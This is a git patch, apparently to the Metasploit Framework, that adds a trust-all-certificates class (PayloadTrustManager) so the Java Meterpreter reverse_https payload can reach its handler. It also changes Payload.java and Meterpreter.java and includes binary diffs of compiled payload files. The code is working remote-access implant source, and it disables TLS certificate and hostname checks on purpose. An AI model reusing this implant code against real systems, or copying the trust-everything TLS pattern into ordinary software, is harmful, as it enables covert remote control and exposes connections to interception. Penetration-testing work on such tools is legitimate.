From 15913dd92c01b35eafa033118e69d835ba2eeaa4 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 16 Apr 2012 13:15:33 -0600 Subject: [PATCH] Squashed commit of the following: commit 97755336f2227a7db668b61e548d2956dddaccb8 Author: Michael Schierl Date: Thu Apr 5 22:33:40 2012 +0200 make sure PayloadTrustManager gets dropped when using Spawn > 0 commit 0d096043e23af5d46a20b7f2c30c5d926ff66f8d Author: Michael Schierl Date: Wed Apr 4 22:15:23 2012 +0200 Fix connection hangs when using java/meterpreter/reverse_https with recent Java versions Reason is that Java thinks the SSL certificate presented by Metasploit is untrusted; therefore add a hack similar to the one in the metasploit.Payload class to trust all certificates here. [Closes #303] --- data/java/metasploit/Payload.class | Bin 8803 -> 8909 bytes data/meterpreter/meterpreter.jar | Bin 22720 -> 23951 bytes .../javapayload/src/metasploit/Payload.java | 3 + .../metasploit/meterpreter/Meterpreter.java | 9 +++ .../meterpreter/PayloadTrustManager.java | 63 ++++++++++++++++++ 5 files changed, 75 insertions(+) create mode 100644 external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java diff --git a/data/java/metasploit/Payload.class b/data/java/metasploit/Payload.class index 505e83d70f4e6bf4e39ca2faba84695da801f329..c8bc897506b6a4d28febbe0324bb2401f67d92c4 100755 GIT binary patch delta 4123 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 H+0lOhcE9Co delta 4239 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 diff --git a/external/source/javapayload/src/metasploit/Payload.java b/external/source/javapayload/src/metasploit/Payload.java index 083d32c256..7afa376932 100644 --- a/external/source/javapayload/src/metasploit/Payload.java +++ b/external/source/javapayload/src/metasploit/Payload.java @@ -105,6 +105,9 @@ public class Payload extends ClassLoader { classFile.getParentFile().mkdirs(); // load ourselves via the class loader (works both on disk and from Jar) writeEmbeddedFile(clazz, clazzFile, classFile); + if(props.getProperty("URL", "").startsWith("https:")) { + writeEmbeddedFile(clazz, "metasploit/PayloadTrustManager.class", new File(classFile.getParentFile(), "PayloadTrustManager.class")); + } FileOutputStream fos = new FileOutputStream(propFile); props.store(fos, ""); fos.close(); diff --git a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java index 79cb3b5678..97377a1f0e 100644 --- a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java +++ b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java @@ -167,6 +167,15 @@ public class Meterpreter { TLVPacket request = null; try { URLConnection uc = url.openConnection(); + if (url.getProtocol().equals("https")) { + // load the trust manager via reflection, to avoid loading + // it when it is not needed (it requires Sun Java 1.4+) + try { + Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[] {URLConnection.class}).invoke(null, new Object[] {uc}); + } catch (Exception ex) { + ex.printStackTrace(getErrorStream()); + } + } uc.setDoOutput(true); OutputStream out = uc.getOutputStream(); out.write(outPacket == null ? RECV : outPacket); diff --git a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java new file mode 100644 index 0000000000..d17fc46287 --- /dev/null +++ b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java @@ -0,0 +1,63 @@ +package com.metasploit.meterpreter; + +import java.net.URLConnection; + +import javax.net.ssl.HostnameVerifier; +import javax.net.ssl.HttpsURLConnection; +import javax.net.ssl.SSLContext; +import javax.net.ssl.SSLSession; +import javax.net.ssl.SSLSocketFactory; +import javax.net.ssl.TrustManager; +import javax.net.ssl.X509TrustManager; +import java.security.cert.X509Certificate; + +/** + * Trust manager used for HTTPS URL connection. This is in its own class because it + * depends on classes only present on Sun JRE 1.4+, and incorporating it into + * the main {@link Meterpreter} class would have made it impossible for other/older + * JREs to load it. + * + * This class is substantically identical to the metasploit.PayloadTrustManager class, + * only that it tries to cache the ssl context and trust manager between calls. + */ +public class PayloadTrustManager implements X509TrustManager, HostnameVerifier { + + public X509Certificate[] getAcceptedIssuers() { + // no preferred issuers + return new X509Certificate[0]; + } + + public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) { + // trust everyone + } + + public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) { + // trust everyone + } + + public boolean verify(String hostname, SSLSession session) { + // trust everyone + return true; + } + + private static PayloadTrustManager instance; + private static SSLSocketFactory factory; + + /** + * Called by the {@link Payload} class to modify the given + * {@link URLConnection} so that it uses this trust manager. + */ + public static synchronized void useFor(URLConnection uc) throws Exception { + if (uc instanceof HttpsURLConnection) { + HttpsURLConnection huc = ((HttpsURLConnection) uc); + if (instance == null) { + instance = new PayloadTrustManager(); + SSLContext sc = SSLContext.getInstance("SSL"); + sc.init(null, new TrustManager[] { instance }, new java.security.SecureRandom()); + factory = sc.getSocketFactory(); + } + huc.setSSLSocketFactory(factory); + huc.setHostnameVerifier(instance); + } + } +}